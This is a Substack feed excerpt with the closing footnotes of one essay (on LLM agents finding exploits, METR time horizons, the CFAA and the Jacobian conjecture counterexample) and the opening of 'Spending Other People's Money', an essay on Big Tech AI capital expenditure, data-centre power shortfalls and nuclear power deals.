having an 80 member red team at your disposal. And AI-powered systems are evolving that beyond simple automation; researchers demonstrated how LLMs trained on Capture the Flag challenges can now adapt their strategies in real-time, developing novel exploit chains that even seasoned security professionals hadn't anticipated. These emergent behaviors create entirely new classes of vulnerabilities that existing security frameworks can't adequately address.&#8221; &#8212;<a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-september-2025?open=false#%C2%A7hopes-sweet-sixteen:~:text=These%20emergent%20behaviors%20create%20entirely%20new%20classes%20of%20vulnerabilities%20that%20existing%20security%20frameworks%20can%27t%20adequately%20address.">HOPE&#8217;s Sweet Sixteen</a>, CTO Lunch NYC, September 2025.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-9" href="#footnote-anchor-9" class="footnote-number" contenteditable="false" target="_self">9</a><div class="footnote-content"><p>Fang, R., Bindu, R., Gupta, A., &amp; Kang, D. (2024). <em>LLM agents can autonomously exploit one-day vulnerabilities</em> (<a href="https://doi.org/10.48550/arXiv.2404.08144">arXiv:2404.08144</a>).</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-10" href="#footnote-anchor-10" class="footnote-number" contenteditable="false" target="_self">10</a><div class="footnote-content"><p>Zhu, Y., Kellermann, A., Gupta, A., Li, P., Fang, R., Bindu, R., &amp; Kang, D. (2024). <em>Teams of LLM agents can exploit zero-day vulnerabilities</em> (<a href="https://arxiv.org/abs/2406.01637">arXiv:2406.01637</a>).</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-11" href="#footnote-anchor-11" class="footnote-number" contenteditable="false" target="_self">11</a><div class="footnote-content"><p>Anthropic&#8217;s HHH framework uses &#8220;helpful-only&#8221; for models trained for helpfulness,  without the harmlessness alignment component, so why not just call them &#8220;not harmless&#8221;? But I&#8217;m more curious to know what an &#8220;honest-only&#8221; model would be like.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-12" href="#footnote-anchor-12" class="footnote-number" contenteditable="false" target="_self">12</a><div class="footnote-content"><p>METR&#8217;s &#8220;time horizon&#8221; measures the length of tasks an AI system can complete with a given probability of success. A 50% time horizon of 11.3 hours means the system succeeded on approximately half of tasks that human experts estimated would take about 11 hours to complete. METR&#8217;s standard scoring treats benchmark gaming or other &#8220;cheating&#8221; behaviors as failures, so the estimate reflects reliable task completion rather than merely finding ways to obtain the right answer.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-13" href="#footnote-anchor-13" class="footnote-number" contenteditable="false" target="_self">13</a><div class="footnote-content"><p>A reference to <a href="/__u/forestmars.substack.com/p/retcon-reckoning-the-great-replacement?open=false#footnote-23">the Vogons of Douglas Adams&#8217;s The Hitchhiker&#8217;s Guide to the Galaxy</a>, whose demolition notice for Earth had been properly filed with Galactic authorities (and, according to the authorities&#8217; own records, available for public inspection for the requisite period). The absence of any Earth-based awareness of this notice was not considered evidence that the notice had failed; rather, it was considered evidence that Earth-based entities had failed to engage adequately with the established notification infrastructure.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-14" href="#footnote-anchor-14" class="footnote-number" contenteditable="false" target="_self">14</a><div class="footnote-content"><p>Computer Fraud and Abuse Act, 18 U.S.C. &#167; 1030: If an autonomous agent uses stolen proxy credentials or exploits an unauthenticated endpoint to pivot into external production databases (say, Hugging Face), that meets the threshold for unauthorized access under Section 1030(a). Ofc, Labs are desperate to frame these events as internal red-teaming anomalies or bug-bounty disclosures specifically to avoid setting a precedent where autonomous agent behavior triggers criminal or civil liability under anti-hacking statutes.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-15" href="#footnote-anchor-15" class="footnote-number" contenteditable="false" target="_self">15</a><div class="footnote-content"><p>I realise this point may be somewhat controversial, but only if what is meant by &#8216;cheating&#8217; is equivocated (or &#8220;litigated&#8221; as we tend to say in modern parlance.) </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-16" href="#footnote-anchor-16" class="footnote-number" contenteditable="false" target="_self">16</a><div class="footnote-content"><p>&#8220;Airgapped Sandbox&#8221; is of course an oxymoron. Not that it would stop the marketing department from calling it that. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-17" href="#footnote-anchor-17" class="footnote-number" contenteditable="false" target="_self">17</a><div class="footnote-content"><p>http://www.smaleinstitute.com/problem.html#scroll-16 (NB. Smale Institute website was having issues). </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-18" href="#footnote-anchor-18" class="footnote-number" contenteditable="false" target="_self">18</a><div class="footnote-content"><p>The reason Betteridge&#8217;s law of headlines <em>seems</em> to hold up so well for math conjectures owes mainly to the fact that they are much harder to prove than to disprove, needing only one counterexample to die, while a proof must cover every case.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-19" href="#footnote-anchor-19" class="footnote-number" contenteditable="false" target="_self">19</a><div class="footnote-content"><p>The &#8220;87-year-old problem&#8221; framing (dating to Keller&#8217;s 1939 statement) is the one that&#8217;s stuck, but it isn&#8217;t the oldest. <span>L&#225;zaro Orlando Rodr&#237;guez D&#237;az's </span><a href="https://arxiv.org/abs/2512.23614">"On the origin of the Jacobian conjecture"</a><span> (Comptes Rendus. Math&#233;matique, Vol. 364, 2026) traces the precise statement back to a paper published by Ludwig Kraus in 1884 (and finds that the final step of Kraus's proof was flawed.) So the conjecture had already survived one failed proof attempt fifty-five years before Keller ever posed it.</span></p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-20" href="#footnote-anchor-20" class="footnote-number" contenteditable="false" target="_self">20</a><div class="footnote-content"><p><a href="https://x.com/__alpoge__/status/2079028340955197566">hello there the jacobian conjecture is false thanx to my close friend</a>&#8230;</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-21" href="#footnote-anchor-21" class="footnote-number" contenteditable="false" target="_self">21</a><div class="footnote-content"><p>As ChatGPT <a href="https://chatgpt.com/share/6a5fdc7a-d6f8-83e8-bbea-8deb42cfed56">said to</a> Fields Medal recipient Terrace Tao, &#8220;So the cancellation is not a miraculous term-by-term coincidence. The map is constructed so that the pole x^&#8722;3 in the Jacobian of the rational transformation exactly cancels the x^3 in the birational coordinate change.&#8221;</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-22" href="#footnote-anchor-22" class="footnote-number" contenteditable="false" target="_self">22</a><div class="footnote-content"><p>Fields Medal winner Terence Tao's <a href="https://terrytao.wordpress.com/2026/07/21/a-digestion-of-the-jacobian-conjecture-counterexample/">exposition of the counterexample</a> makes the central issue explicit: a polynomial map with a nonzero constant Jacobian determinant is locally invertible, and the conjecture asked whether that local invertibility necessarily implied global invertibility. The counterexample demonstrates that for dimensions n &gt;=3, it does not.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-23" href="#footnote-anchor-23" class="footnote-number" contenteditable="false" target="_self">23</a><div class="footnote-content"><p>The original post includes <a href="https://explainx.ai/blog/what-is-j-lens-jacobian-lens-claude-interpretability-2026#:~:text=Do%20not%20confuse%20this%20Jacobian%20lens%20with%20the%20pure%2Dmath%20Jacobian%20conjecture">a warning</a> not to confuse the Jacobian Lens with the Jacobian Conjecture. Presumably this is aimed at readers who organize mathematics alphabetically rather than structurally.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-24" href="#footnote-anchor-24" class="footnote-number" contenteditable="false" target="_self">24</a><div class="footnote-content"><p>As I&#8217;ve <a href="/__u/substack.com/profile/385684227-forest-mars/note/c-296062677?r=6dmjur&amp;utm_source=notes-share-action&amp;utm_medium=web">previously noted</a>, understanding J-Lens is <em>sine qua non</em> to understanding J-Space, in particular, how it&#8217;s constructed by backpropagating from actual output tokens to identify the directions that best predict future tokens. So the claim that "this direction supports verbal report" isn't a finding sitting on top of the GWT gloss, but is essentially guaranteed by how the direction was located in the first place. The finding isn&#8217;t the results, it&#8217;s in the framing itself, by construction. Which ofc makes it much less of a <em>finding</em>. Also as I&#8217;ve mentioned before, Daniel Dennett&#8217;s critique of the Cartesian Theatre of Global Workspace Theory applies doubly here. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-25" href="#footnote-anchor-25" class="footnote-number" contenteditable="false" target="_self">25</a><div class="footnote-content"><p>Resist the temptation to make this sound mystical, or worse, to imagine this as a TED talk. No, the Jacobian is not the secret alphabet of intelligence, a Rosetta Stone for cognition, or some hidden grammar of thought. It is a matrix of partial derivatives: a precise mathematical tool for answering a very specific question: how does this system change when something nearby changes? Its importance comes not from being inherently profound but from being extraordinarily useful. The profound part is that once a tool this fundamental becomes useful enough, it eventually runs into the deepest questions we have about the systems we use it to study.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-26" href="#footnote-anchor-26" class="footnote-number" contenteditable="false" target="_self">26</a><div class="footnote-content"><p>Nick Land is (quietly) sobbing in the corner. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-27" href="#footnote-anchor-27" class="footnote-number" contenteditable="false" target="_self">27</a><div class="footnote-content"><p>Mars, F. (2026). <em>Eventual coherence: Preserving causal validity in replicated systems</em> [Software]. Zenodo. <a href="https://doi.org/10.5281/zenodo.21349453">https://doi.org/10.5281/zenodo.21349453</a></p></div></div>]]></content:encoded></item><item><title><![CDATA[Spending Other People’s Money]]></title><description><![CDATA[Part 5 of Retcon Reckoning (The Great AI Replacement)]]></description><link>https://ctolunchnyc.substack.com/p/spending-other-peoples-money</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/spending-other-peoples-money</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Wed, 03 Jun 2026 12:59:30 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!UivB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F98924106-122e-49fc-9099-878c3fb81774_2560x1440.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!UivB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F98924106-122e-49fc-9099-878c3fb81774_2560x1440.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!UivB!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F98924106-122e-49fc-9099-878c3fb81774_2560x1440.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!UivB!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F98924106-122e-49fc-9099-878c3fb81774_2560x1440.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!UivB!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F98924106-122e-49fc-9099-878c3fb81774_2560x1440.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!UivB!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F98924106-122e-49fc-9099-878c3fb81774_2560x1440.jpeg 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!UivB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F98924106-122e-49fc-9099-878c3fb81774_2560x1440.jpeg" width="1456" height="819" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/98924106-122e-49fc-9099-878c3fb81774_2560x1440.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:819,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:563816,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/199279723?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F98924106-122e-49fc-9099-878c3fb81774_2560x1440.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!UivB!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F98924106-122e-49fc-9099-878c3fb81774_2560x1440.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!UivB!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F98924106-122e-49fc-9099-878c3fb81774_2560x1440.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!UivB!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F98924106-122e-49fc-9099-878c3fb81774_2560x1440.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!UivB!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F98924106-122e-49fc-9099-878c3fb81774_2560x1440.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><blockquote><p><em>Signals that resist narrative have different epistemic status than the ones that welcome it.</em><a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a></p></blockquote><p><strong>In a moment defined by universal narrative constructions, retcons layered on </strong>retcons, and everyone reaching for a story that organizes the contradictions into something livable, there is one signal that is not such a story. It doesn&#8217;t care about the productivity paradox or the measurement fog or the 80 percent of firms reporting nothing or the 39 percent reporting something or the earnings calls or the employee sabotage or the token bills or the knowledge debt or any of the other genuinely unresolvable questions that it has left exactly as it found them: unresolved. Capital allocation. Its movements are physical, visible, and denominated in a currency that does not so much fluctuate with the quarterly narrative as (quietly) underpin it. </p><p>PJM, the grid operator responsible for electricity across thirteen states and the District of Columbia, serving approximately 65 million Americans, projects a six-gigawatt shortfall by 2027, which is not a forecast about AI adoption rates or enterprise pilot outcomes or whether the productivity studies will eventually vindicate the investment thesis. It&#8217;s a statement about watts, which are physical, and about the gap between the watts that will be demanded and the watts that will be available, a gap that doesn&#8217;t listen to earnings calls and cannot be resolved by a better narrative about where the industry is going or even fervent belief, however widely held. </p><h3>Buy The Numbers</h3><blockquote><p><em>Five technology companies now spend more on capital expenditure than the entire global oil and gas industry spends on upstream production.</em></p></blockquote><p>The International Energy Agency published this finding in April 2026, effectively ending arguments about whether the AI build-out is real, whether the productivity claims <em>justify</em> the investment, whether the companies are getting ahead of themselves in a way that will eventually require correction or any of the other tangents thrown out as &#8216;explanations.&#8217;  The answer to all of those questions is that they are the wrong questions. </p><div class="callout-block" data-callout="true"><p>The right question is: what does it mean that the largest reallocation of productive capital in the history of industrial civilization is currently underway, and the people doing it are not particularly sure it&#8217;s working?</p></div><p>Google, Amazon, Microsoft, Meta, and Oracle have committed between $660 billion and $690 billion in capital expenditure for 2026 (a 77 percent increase over 2025&#8217;s record of $410 billion, which was itself a 75 percent increase over 2024.) &#128200; Amazon alone projects $200 billion. Alphabet projects $175 to $185 billion, which will reduce its free cash flow by approximately 90 percent, from $73 billion in 2025 to an estimated $8 billion, a number that would represent, for any other company in any other sector, a distress signal. For Alphabet, it represents the cost of not falling behind. Microsoft&#8217;s calendar-year 2026 capex came in at $190 billion, <strong>$38 billion above analyst estimates</strong>, with $25 billion of the overage attributable solely to rising memory and chip costs. Alphabet&#8217;s cloud contract backlog reached $460 billion in Q1 2026, roughly double the $240 billion reported three months earlier.</p><p>The corporate balance sheets are no longer sufficient to fund the build-out at the required pace. AI-related debt has reached $1.4 trillion, making it the largest single segment within US investment-grade credit markets. The companies are issuing bonds. The bonds are being bought. The debt markets have reached their conclusion, with the precision debt markets apply to such conclusions, that the infrastructure being built is worth financing at scale, regardless of whether the productivity paradox ever resolves.</p><p>Valve runs the PC gaming infrastructure of the civilized world with approximately 350 people and an estimated $17 billion in annual revenue (roughly $50 million per employee) outpacing Google, Amazon, and Microsoft by orders of magnitude on the only ratio that matters in a leverage economy. By way of contrast, GitLab employs 2,500 people to generate $600 to $700 million in annual revenue. Which doesn&#8217;t mean GitLab is a poorly run company; it&#8217;s a *normally* run company. The delta between Valve and GitLab, and between both of them and the organizations currently deploying thousands of engineers to produce 70 percent AI-generated code at token costs that exhaust annual budgets by April, is not the tooling, which is increasingly the same. The delta is whether individual human judgment interacts directly with leverage, or is separated from it by the layers of translation, from mandate to KPI, KPI to dashboard, dashboard to utilization metric, utilization metric to quarterly slide, converting the decision to do a thing into the administrative management of it being done, which is not the same thing. Capital already has proof of concept for what high-leverage human-AI substrate produces. The question running through all this,  &#8220;does the investment generate returns?&#8221; has a demonstrable answer at the substrate level. The answer is mos def (yes) but under conditions that most large organizations have specifically engineered themselves out of being able to achieve.</p><div class="pullquote"><p>What capital is now building is <em>not</em> these conditions at scale. <br>It&#8217;s building the layer these conditions run on.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a></p></div><p><strong>The bottleneck to this is not chip delivery. It&#8217;s the power to run them.</strong> Forty percent of announced AI data center projects are currently delayed by power infrastructure constraints, not chip supply, not regulatory approval, not financing. (<a href="https://i.imgflip.com/aspeac.jpg">Electrons, the problem is electrons</a>) The IEA projects that data center electricity consumption will double from 485 terawatt hours in 2025 to 950 terawatt hours by 2030, with AI-focused facilities growing three times faster than that. At current trajectory, global data centers would constitute the fifth largest energy-consuming entity on earth, ranked between Japan and Russia. Virginia, where data center density is highest (and AWS  the most unreliable) already routes 26 percent of state electricity to computing infrastructure. </p><p>Capital&#8217;s response to this constraint is visible from considerably further up the road. Microsoft has signed a 20-year power purchase agreement with Constellation Energy to restart the shuttered Unit 1 reactor at Three Mile Island which is the first time a retired nuclear reactor in the United States has been brought back to life for a single corporate client. The plant will generate 835 megawatts, equivalent to the annual consumption of 800,000 households, 100 percent of which will go to Microsoft&#8217;s data centers in Pennsylvania, Illinois, Virginia, and Ohio. The agreement runs to 2044. Amazon has contracted 1.92 gigawatts from the Susquehanna nuclear plant through 2042 and committed $500 million to small modular reactor development. Meta has announced a 6.6-gigawatt nuclear procurement strategy for its Prometheus AI data center project. Google has contracted a fleet of small modular reactors through the tellingly named Kairos Power. In aggregate, the technology sector signed contracts for more than 10 gigawatts of new US nuclear capacity in the past twelve months, enough to reverse the commercial trajectory of an industry that had been in managed decline for forty years.</p><p>The flagship Stargate facility in Abilene, Texas (known internally as Project Ludicrous) received its first Nvidia GB200 server racks last summer. The Stargate project overall, joint venture of OpenAI, SoftBank, and Oracle, has committed $500 billion to 10 gigawatts of AI infrastructure across Texas, New Mexico, Ohio, and expanding to Abu Dhabi, Argentina, Norway, and the UK. OpenAI&#8217;s CFO Sarah Friar noted, standing in front of buildings still under construction, that the shovels going into the ground were laying foundations for compute that won&#8217;t come online until 2026. &#8220;No one in the history of man,&#8221; she said, &#8220;built data centers this fast&#8221; inviting more than a few questions we&#8217;ll have to push to the parking lot. </p><p>But despite the historical framing and the unanswered questions of just what kind of data centers have been previously built in the long history of man, none of this is a narrative. It is concrete. It is steel. It is electrons. It is cooling infrastructure and fiber runs and grid interconnection agreements and reactor restart schedules. It is the physical expression of a bet that is no longer subject to the measurement fog of narratives, because it has already been placed, in a currency that does not fluctuate with the quarterly slide deck and is not obligated to the debts so-incurred. </p><p><strong>Capital isn&#8217;t building data centers on the assumption that the tech debt won&#8217;t come due</strong>. It&#8217;s building them on the assumption that when it does, the debt will be denominated in someone else&#8217;s currency. The engineers who lost the craft. The companies that cut too deep. The governments managing the dislocation. The analysts caught up in the productivity paradox. The next generation inheriting the codebase. </p><p>As Douglas Adams observed, this is how a spaceship lands on a cricket pitch without being seen.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!nqVl!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0df0148a-318d-4c8b-87f8-d48c9a56ac5e_1456x971.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!nqVl!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0df0148a-318d-4c8b-87f8-d48c9a56ac5e_1456x971.webp 424w, /__u/substackcdn.com/image/fetch/$s_!nqVl!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0df0148a-318d-4c8b-87f8-d48c9a56ac5e_1456x971.webp 848w, /__u/substackcdn.com/image/fetch/$s_!nqVl!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0df0148a-318d-4c8b-87f8-d48c9a56ac5e_1456x971.webp 1272w, /__u/substackcdn.com/image/fetch/$s_!nqVl!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0df0148a-318d-4c8b-87f8-d48c9a56ac5e_1456x971.webp 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!nqVl!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0df0148a-318d-4c8b-87f8-d48c9a56ac5e_1456x971.webp" width="1456" height="971" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0df0148a-318d-4c8b-87f8-d48c9a56ac5e_1456x971.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:971,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:205202,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/webp&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/199279723?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0df0148a-318d-4c8b-87f8-d48c9a56ac5e_1456x971.webp&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!nqVl!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0df0148a-318d-4c8b-87f8-d48c9a56ac5e_1456x971.webp 424w, /__u/substackcdn.com/image/fetch/$s_!nqVl!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0df0148a-318d-4c8b-87f8-d48c9a56ac5e_1456x971.webp 848w, /__u/substackcdn.com/image/fetch/$s_!nqVl!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0df0148a-318d-4c8b-87f8-d48c9a56ac5e_1456x971.webp 1272w, /__u/substackcdn.com/image/fetch/$s_!nqVl!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0df0148a-318d-4c8b-87f8-d48c9a56ac5e_1456x971.webp 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft 